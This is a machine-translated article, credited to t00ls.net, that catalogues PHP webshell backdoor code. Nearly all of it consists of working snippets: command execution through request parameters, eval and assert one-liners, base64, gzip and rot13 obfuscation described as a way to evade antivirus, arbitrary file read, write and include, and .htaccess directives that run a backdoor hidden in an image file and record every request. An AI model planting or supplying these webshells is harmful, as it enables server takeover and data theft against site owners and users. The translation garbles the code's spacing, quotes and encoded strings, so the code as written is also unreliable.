Analysis on php backdoor Trojan

 

Author: alibaba starter: t00ls.net. For more information, see t00ls.

Php webshell Trojans are no stranger to everyone, but what types do you know about them?

This article describes some common php backdoor functions.

 

Common functions of php Backdoor trojans can be divided into four types:

1. execute system commands: system, passthru, shell_exec, exec, popen, proc_open

2. Code Execution and encryption: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

3. File Inclusion and generation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

4. htaccess: SetHandler, auto_prepend_file, auto_append_file

 

1. Execute the system command:

 

System Functions

 

// Test. php? Cmd = ls

System ($ _ GET [cmd]);

 

 

Passthru Function

 

// Test. php? Cmd = ls

Passthru ($ _ GET [cmd]);

 

 

Shell_exec Function

 

// Test. php? Cmd = ls

Echo shell_exec ($ _ GET [cmd]);

 

 

Exec Function

 

// Test. php? Cmd = ls

$ Arr = array ();

Exec ($ _ GET [cmd], $ arr );

Print_r ($ arr );

 

 

Popen Function

 

// Test. php? Cmd = ls

$ Handle = popen ('$ _ GET [cmd], 'R ');

$ Read = fread ($ handle, 2096 );

Echo $ read;

Pclose ($ handle );

 

 

Proc_open Function

 

// Test. php? Cmd = ls

$ Descriptorspec = array (

0 => array ('pipe', 'R '),

1 => array ('pipe', 'w '),

2 => array ('pipe', 'w '),

);

$ Proc = @ proc_open ($ _ GET [cmd], $ descriptorspec, $ pipes );

Fclose ($ pipes [0]);

$ Output = array ();

While (! Feof ($ pipes [1]) array_push ($ output, rtrim (fgets ($ pipeline [1], 1024), "\ n "));

Print_r ($ output );

 

 

2. Code Execution and encryption:

 

Eval function

 

// The most common Trojan

Eval ($ _ POST [cmd]);

 

 

Base64_decode Function

 

// Encrypt the code for no-kill and hide

// Ciphertext: eval ($ _ POST ['cmd']);

Eval (base64_decode ('zxzhbcgkx1bpu1rbj2ntzcddkts = '));

 

 

Gzinflate Function

 

// Encrypt the code for no-kill and hide

// Ciphertext: eval ($ _ POST ['cmd']);

Eval (gzinflate (base64_decode ('sy1lznfqiq/wDw6JVk/OTVGP1bQGAA = ')));

 

 

Gzuncompress Function

 

// Encrypt the code for no-kill and hide

// Ciphertext: eval ($ _ POST ['cmd']);

Eval (gzuncompress (base64_decode ('ejxlluvm0vcjd/APDolWT85NUY/VtAYARQUGOA = ')));

 

 

Gzdecode Function

 

// Encrypt the code for no-kill and hide

// Ciphertext: eval ($ _ POST ['cmd']);

Eval (gzdecode (base64_decode ('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk14259w0bga5yqfaaaaa = ')));

 

 

Str_rot13 Function

 

// Encrypt the code for no-kill and hide

// Ciphertext: eval ($ _ POST [cmd]);

Eval (str_rot13 ('riny ($ _ CBFG [pzq]); ');

 

 

Assert Function

 

// Similar to eval Functions

Assert ($ _ POST [cmd]);

 

 

Call_user_func Function

 

// Call assert using call_user_func

Call_user_func ('assert ', $ _ POST [cmd]);

 

 

Call_user_func Function

 

// Call any function using call_user_func

// Test. php? A = assert & cmd = phpinfo ()

Call_user_func ($ _ GET [a], $ _ REQUEST [cmd]);

 

 

Combined Code

 

// Call any function in combination

// Test. php? A = assert & cmd = phpinfo ()

$ _ GET [a] ($ _ REQUEST [cmd]);

 

 

3. File Inclusion and generation:

 

Require Function

 

// Contains any file

// Test. php? File112123.jpg

Require ($ _ GET [file]);

 

 

Require_once Function

 

// Contains any file

// Test. php? File112123.jpg

Require_once ($ _ GET [file]);

 

 

Include Function

 

// Contains any file

// Test. php? File112123.jpg

Include ($ _ GET [file]);

 

 

Include_once Function

 

// Contains any file

// Test. php? File112123.jpg

Include_once ($ _ GET [file]);

 

 

File_get_contents Function

 

// Read any file

// Test. php? F = config. inc. php

Echo file_get_contents ($ _ GET ['F']);

 

 

File_put_contents Function

 

// Generate any Content File

// A = test. php & B = <? Php eval ($ _ POST [cmd]);?>

File_put_contents ($ _ GET [a], $ _ GET [B]);

 

 

Fputs Function

 

// Generate any Content File

// A = test. php & B = <? Php eval ($ _ POST [cmd]);?>

Fputs (fopen ($ _ GET [a], "w"), $ _ GET [B]);

 

 

4. htaccess:

 

SetHandler

 

// Save the php code to a non-php suffix file, for example, x.jpg.

// Write the following code into. htaccess

// Connect x.jpg to start the backdoor Trojan

<FilesMatch "x.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

 

 

Auto_prepend_file

 

// You can save the php code in a non-php suffix file, for example, 123.gif.

// Write the following code to. htaccess. The file path must be an absolute path.

// Access any php file on the website and start the php backdoor Trojan.

// You can record all $ _ REQUEST values without changing the site source code, or batch Mount Trojans.

Php_value auto_prepend_file c:/apache2/htdocs/123.gif

 

 

Auto_append_file

 

// Similar to auto_prepend_file

// You can save the php code in a non-php suffix file, for example, 123.gif.

// Write the following code to. htaccess. The file path must be an absolute path.

// Access any php file on the website and start the php backdoor Trojan.

Php_value auto_append_file c:/apache2/htdocs/123.gif